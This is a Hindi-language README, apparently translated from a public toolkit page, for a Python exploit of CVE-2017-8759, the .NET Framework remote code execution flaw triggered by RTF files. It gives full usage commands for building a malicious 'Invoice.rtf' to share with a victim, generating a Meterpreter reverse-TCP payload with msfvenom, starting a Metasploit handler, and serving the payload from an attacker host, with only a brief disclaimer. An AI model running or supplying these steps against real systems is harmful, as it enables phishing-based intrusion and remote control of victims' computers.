
CVE-2017-8759 माइक्रोसॉफ्ट वर्ड भेद्यता शोषण स्क्रिप्ट
CVE-2017-8759 शोषण उपकरण एक उपयोगी पायथन स्क्रिप्ट है जो पेंटेस्टर्स और सुरक्षा शोधकर्ताओं को Microsoft .NET Framework RCE का परीक्षण करने का एक त्वरित और प्रभावी तरीका प्रदान करता है। यह एक दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न कर सकता है और बिना किसी जटिल कॉन्फ़िगरेशन के पीड़ित तक metasploit / meterpreter / अन्य पेलोड पहुंचा सकता है।
यह प्रोग्राम केवल शैक्षिक उद्देश्य के लिए है। बिना अनुमति के इसका उपयोग न करें। सामान्य अस्वीकरण लागू होता है, विशेष रूप से यह तथ्य कि मैं (bhdresh) इन प्रोग्रामों द्वारा प्रदान की गई जानकारी या कार्यक्षमता के प्रत्यक्ष या अप्रत्यक्ष उपयोग से होने वाली किसी भी क्षति के लिए उत्तरदायी नहीं हूँ। लेखक या कोई भी इंटरनेट सेवा प्रदाता इन प्रोग्रामों की सामग्री या दुरुपयोग या इनके किसी भी व्युत्पन्न के लिए कोई जिम्मेदारी नहीं लेता है। इस प्रोग्राम का उपयोग करके आप इस तथ्य को स्वीकार करते हैं कि इन प्रोग्रामों के उपयोग से होने वाली कोई भी क्षति (डेटा हानि, सिस्टम क्रैश, सिस्टम से छेड़छाड़, आदि) bhdresh की जिम्मेदारी नहीं है।
अंत में, यह एक व्यक्तिगत विकास है, कृपया इसके दर्शन का सम्मान करें और इसका उपयोग बुरे कामों के लिए न करें!
स्क्रिप्ट में निम्नलिखित क्षमताएँ जोड़ी गई हैं:
- दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें
- उत्पन्न RTF फ़ाइल के लिए शोषण मोड
संस्करण: Python संस्करण 2.7.13
1) दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (वैकल्पिक, यदि MSF पेलोड का उपयोग कर रहे हैं): metasploit पेलोड उत्पन्न करें और हैंडलर प्रारंभ करें
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) स्थानीय पेलोड वितरित करने के लिए टूलकिट को शोषण मोड में प्रारंभ करें
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)
Modes:
-M gen Generate Malicious file only
Generate malicious RTF/PPSX file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.txt> Path of remote txt file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.txt (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation:
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Specify local path of an executable file / meterpreter shell / payload.